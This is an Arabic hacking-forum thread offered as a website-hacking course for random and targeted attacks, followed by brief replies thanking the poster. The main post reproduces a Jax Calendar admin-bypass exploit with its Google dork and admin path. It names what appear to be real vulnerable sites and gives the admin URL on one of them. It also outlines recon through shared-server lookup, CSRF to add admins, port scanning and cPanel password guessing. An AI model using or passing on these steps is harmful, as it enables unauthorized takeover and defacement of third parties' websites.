:wijnk:اليوم ساشرح لكم عملية الاختراق العشوائي والمستهدف..:wijnk: فهرس الموضوع؛ الاختراق العشوائي؛ -الدورك ـالثغرات ـالسكريبتات الاختراق المتقدم...

b10001

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
DX%2BJoker%2Bbanner.jpg


بسم%20الله.gif

:wijnk:اليوم ساشرح لكم عملية الاختراق العشوائي والمستهدف..:wijnk:
فهرس الموضوع؛

الاختراق العشوائي؛
-الدورك
ـالثغرات
ـالسكريبتات

الاختراق المتقدم استهداف المواقع؛
ـالشل
ـالثغرات
-الاندكس
ـالفحص

الادوات؛
netcraft

webscanner http://www.brothersoft.com/1-more-webscanner-37463.html

1337day.com




التطبيق؛

نروح ل1337day تماام طلعلنا هكذا؛


attachment.php


ابنكتب مثلا؛
inurl , powered by , bypass , sql; ......
ونبحث
http://1337day.com/search:rules:

انفترض كتبنا PASSWORD BY PASS
اووووكيه
اطلعولنا ثغرااااااات كثيييرة بنختار واحدة منهم انا مثلا اخترت
http://1337day.com/exploits/14336

طلعتلنا الثغرة:wijnk:

:rules:
PHP:
=======================================
Jax Calender admin bypass vulnerability
=======================================

# Exploit Title: Jax Calender admin bypass vulnerability
# Date: 3.10.2010
# Author: EraGoN
# Software Link: http://www.jtr.de/scripting/php/calendar/index_eng.html
# Version: 1.1
# Tested on: Windows XP - SP2/SP3

Hi guys !

Dork :
 inurl:jax_calendar.php

In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

URL to add :

/admin/calendar.admin.php

You can add news writing hacked etc.. ;)

Results in /../jax_calendar.php

DEMO :
http://www.hunde-ausstellungen.de/calendar/jax_calendar.php

###############

http://www.zone-h.org/archive/published=0/notifier=EraGoN

Greetz : The|Denny - Loock3D - DJ-DUKLI and all albanian/kosovo hackers !

www.eragon.ws - www.albanian-legends.com

###############



بناخذ المعلومات المهمة ؛
الدورك او الكود الي بنكتبوا في القوقل يعطينا مواااقع مصاابة

Dork :
inurl:jax_calendar.php

In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

الاستغلال

PHP:
In the url http://site.com/calendar/jax_calendar.php delete jax_calendar.php

URL to add :

/admin/calendar.admin.php

You can add news writing hacked etc.. ;)
ثم نبحث؛

http://www.google.tn/search?hl=fr&s....php&btnG=Recherche+Google&aq=f&aqi=&aql=&oq=

هذا موقع مصاب

PHP:
http://www.aleval.net/aleval-script/jax_calendar/jax_calendar.php?language=french

هنتبق عليه الاستغلال

PHP:
http://www.aleval.net/aleval-script/jax_calendar//admin/calendar.admin.php

هيللا ومنغيير وجع راس انت الان ادمين فابدا الدعس:biggrin::biggrin::diablo:


الطريقة الثانية:alla::rules:


بركة الله :~

## ملاحظة / ارجوا التثبيت لتعم الفائدة Guests cannot see images in the messages. Please register to forum by clicking here to see images. !!

1- جمع المعلومات حول الموقع المستهدف :: ~

س/ كيف نجمع المعلومات ؟

ج/ في طرق كثيرة لكن الغالب هو مواقع جمع المعلومات حول الدومين [ whois ]

وهذا افضل مواقع whois من وجهة نظري Guests cannot see images in the messages. Please register to forum by clicking here to see images.

كود:
http://network-tools.com/
http://tools.whois.net/whoisbyip/
http://whois.domaintools.com/
وهذا موقع عربي نفس وظيفة المواقع اعلاه

كود:
http://whois.domaintools.com/

طريقة جمع المعلومات حول الموقع المستهدف ::~

الشرح بسيط بكم صورة ،، تفضلوا :

ندخل على الموقع :

كود:
http://whois.domaintools.com/
Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 726x117.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

بعد البحث :

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 687x436.Guests cannot see images in the messages. Please register to forum by clicking here to see images.


خلصنا الحين من جمع المعلومات Guests cannot see images in the messages. Please register to forum by clicking here to see images.

س/ اش استفيد من جمع المعلومات ؟!

ج/ له فوائد كثيرة وعلى حسب المخترق وخبرته يعني بعض المخترقين ياخذ الايميل المسجل به <~ من اجل سحب الدومين !!

والبعض يشوف المواقع اللي على السيرفر <~ من اجل يستخرج ثغرات السيرفر !! .... الخ Guests cannot see images in the messages. Please register to forum by clicking here to see images.




2- استخراج المواقع اللتي على سيرفر الموقع المستهدف :: ~

س/ كيف يعني المواقع اللي على السيرفر ؟

ج/ الحين اي موقع له سيرفر مشترك فيه علشان يشتغل معاه الموقع وبعض المواقع تاخذ سيرفر vps ( يعني سيرفر خاص ) ،، احنا الحين نشوف المواقع اللي مشتركة في نفس سيرفر الموقع المستهدف .


س/ اش الفائدة من استخراج المواقع ؟

ج/ من اجل نخترق اي موقع منها وبكذا يكون اخترقنا السيرفر وراح ننتقل بالشل الى الموقع المستهدف او قرائة الكونفق اذا كان المستهدف منتدى !!



نبدأ على بركة الله :~

نستخرج الاي بي حق السيرفر :: ~

الطريقة كالاتي :

ندخل شاشة الدوس <~ Start > Run > CMD

ونكتب فيها :

كود:
ping www.iTaChi.org
نستبدل الموقع بالموقع المستهدف !

نشوف الصورة ،،

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 677x342.Guests cannot see images in the messages. Please register to forum by clicking here to see images.


س/ الحين طلعنا الاي بي ،، كيف نجيب المواقع اللي على السيرفر ؟

ج/ نروح لهالموقع

كود:
www.bing.com
ونكتب في خانة البحث

كود:
ip:xxxxxxxxx
مع التغيير الى الاي بي المستهدف !!

تابع ~

Guests cannot see images in the messages. Please register to forum by clicking here to see images.This image has been resized. Click this bar to view the full image. The original image is sized 658x555.Guests cannot see images in the messages. Please register to forum by clicking here to see images.

تماام الحين نشوف الثغرات اللي في المواقع ،، Guests cannot see images in the messages. Please register to forum by clicking here to see images.


س/ كيف نستخرج ثغرات المواقع ؟

ج/ نستخرج السكربتات اول ومن ثم نشوف السكربتات المصابة !!

وان شاء الله راح اسوي لها شرح في القريب العاجل Guests cannot see images in the messages. Please register to forum by clicking here to see images.


3- اختراق جهاز الادمن :: ~

ما يحتاج لها شرح <~ نخترق جهاز المدير ونسحب بيانات لوحة التحكم ونخترق الموقع :Guests cannot see images in the messages. Please register to forum by clicking here to see images.



4- ثغرات Cross-site request forgery | CSRF| :: ~

الثغرات هذي قوية جدا وانتشرت في الايام الاخيرة

Guests cannot see images in the messages. Please register to forum by clicking here to see images.


س/ ماهي ثغرات csrf ?

ج/ اسمها ثغرات اضافة الادمن ،، بحيث انك ترسل له رسالة على نفس الموقع فيها رابط !!

اول ما الادمن يفتح الرابط راح يضاف في لوحة التحكم مدير جديد بالبيانات اللي حددتها انت er5#


وراح نتظرق لشرحها في دروس قادمة باذن الله ~


5- فحص البورتات المفتوحة واكتشاف الاخطاء ::~

طريقة فحص البورتات المفتوحة واستغلالها يكون عن طريقة اداة Nmap الشهيرة !!


Guests cannot see images in the messages. Please register to forum by clicking here to see images.

هذا الموقع الخاص بالادة للفائدة :~

كود:
http://nmap.org/


اما طريقة اكتشاف الاخطاء فتكون عن طريق اداة Nikto Guests cannot see images in the messages. Please register to forum by clicking here to see images.

Guests cannot see images in the messages. Please register to forum by clicking here to see images.

موقع اداة nikto للفائدة

كود:
http://cirt.net/nikto2
6- التخمين ::~

التخمين وسيلة من وسائل الاختراق وله قيمته !!

وهو عادة يكون في اخر شي <~ اذا قفلت في وجهك lol45

والتخمين يكون على السي بانل عادة

كود:
www.iTaChi.org:2082



بتقولون لي ليه ما شرحت كيف نطلع الاخطاء :Guests cannot see images in the messages. Please register to forum by clicking here to see images.


اقلكم هذي يبي لها مواضيع خاصة فيها افضل !!

وانا اليوم شرحت الخطوات الاساسية <~ لان البعض ما يعرفها Guests cannot see images in the messages. Please register to forum by clicking here to see images.


تم الشرح بواسطة iTaChi

ارجوا حفظ الحقوق عند النقل d#2

ان شاء الله اكون وفقت في الشرح ،،

لا تنسوني من صالح دعائكم mm77


اخوكم : iTaChi Guests cannot see images in the messages. Please register to forum by clicking here to see images.

_.gif


DX%2BJoker%2Bbanner.jpg
 

spid3rnet

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
يآآآا سلآآام مشكووور

وآاصل في متل هده المواضيع أخي
 
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
ماشاء الله انت دكرت جميـــع الطرق التي يتم تتبعها في اختراق اي موقع او ..~
تحياتي..~

تقييم :)

+++++
 

المفترس

:: مهووس الكمبيوتر ::
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رائع الله يبارك فيك
ولكن المرة القادمة نسق الموضوع لكي يكون اكتر قراءة وجمال
 
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

machkoooooooor akhi !!!! alah ye3tek ASSA7A WE RA7A WTOL EL3omr
 
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

مشكووووووووور
 

DR.MESHAL

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

مبددددددددددددددددددددددددددددددع
 

°l||l° نور الظلام °l||l°

<img src="http://vbspiders.com/vb/images/rank/modw
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

موفق خيي
شرح حلوو انا عرفت بعض الامورر الحمدلله :)
 

MahmoudH

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

شكرااااااااااااااااااااااااااااااااااااااااااا
 

jsms1

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

بارك الله فيك اخي
 

محمد50

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

واصل تميزك أخي
شكرا يا الغالي
*********************************************************
تم الحذف من قبل الإدارة


´´´´´´´´´´´´´´´´´¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´´
´´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´
´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´
´´´´´´´´´´´¶¶´¶¶´´´¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´¶¶´¶¶´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶¶¶´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶´´´´´´´´´´´´´
´´´´¶¶¶´´´´´´´¶¶´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´¶¶´´´´´´¶¶¶¶´´´
´´´¶¶¶¶¶´´´´´¶¶´´´¶¶¶¶¶¶¶´´´¶¶¶´´´¶¶¶¶¶¶¶´´´¶¶´´´´´¶¶¶¶¶¶´´
´´¶¶´´´¶¶´´´´¶¶´´´´´¶¶¶´´´´¶¶¶¶¶´´´´¶¶¶´´´´´¶¶´´´´¶¶´´´¶¶´´
´¶¶¶´´´´¶¶¶¶´´¶¶´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´¶¶¶¶´´´´¶¶¶´
¶¶´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´¶¶
¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶¶´´´´´´¶¶¶¶¶¶¶¶
´´¶¶¶¶´¶¶¶¶¶´´´´´´¶¶¶¶¶´´´´´´´´´´´´´´¶¶¶´¶¶´´´´´¶¶¶¶¶¶´¶¶¶´
´´´´´´´´´´¶¶¶¶¶¶´´¶¶¶´´¶¶´´´´´´´´´´¶¶´´¶¶¶´´¶¶¶¶¶¶´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´´´¶¶´¶¶´¶´¶´¶´¶´¶´¶´¶´¶´¶¶´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶¶´´¶´¶´¶´¶´¶´¶´¶´¶´´´¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶¶´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶¶¶´´´¶¶´¶¶¶¶¶´´´´´´´´´´´´
´´´´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´´´´´´¶¶´´´´´´¶¶¶¶¶¶¶¶¶´´´´
´´´¶¶´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´´
´´´´¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶´´´´
´´´´´´¶¶´´´¶¶¶´´´´´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´´´´¶¶¶´´´¶¶´´´´´´
´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´
´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´
 
التعديل الأخير بواسطة المشرف:

YaHiA "Ds"

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

مشكووور
 

wisejerk

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف


شكرا لك يا اخي
و الله موضوع مفيد جيدا
ان شاء الله في ميزان حسناتك
بالتوافق لك
 

inshtaine

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

واصل تميزك أخي
 

Spire_Barde

New Member
دورة اختراق المواقع من قبلي ادخل وستخرج محترف
رد: دورة اختراق المواقع من قبلي ادخل وستخرج محترف

والله يا غالي لو تتبعت شروحاتك أكيد أكيد سأكره الهكر و كل ما يتعلق بالهكر
شرحكا لا علاقة له بالشرحات المتميزة
هذه حقيقة و لن اكذب عليك أو أنافقك
لما قرأت الجزء الأول منه و الله مللت الى درجة أنني أردت أن أسخط على هذا المنتدى و اقسم على ان لا أزوره مرة أخرى.. لكني تمالكت نفسي و تذكرت شرحات الأخ كلاشنيكوف
أين أنت من هذه الشروحات هيهات هيهات ان تصل الى مستواها
 
أعلى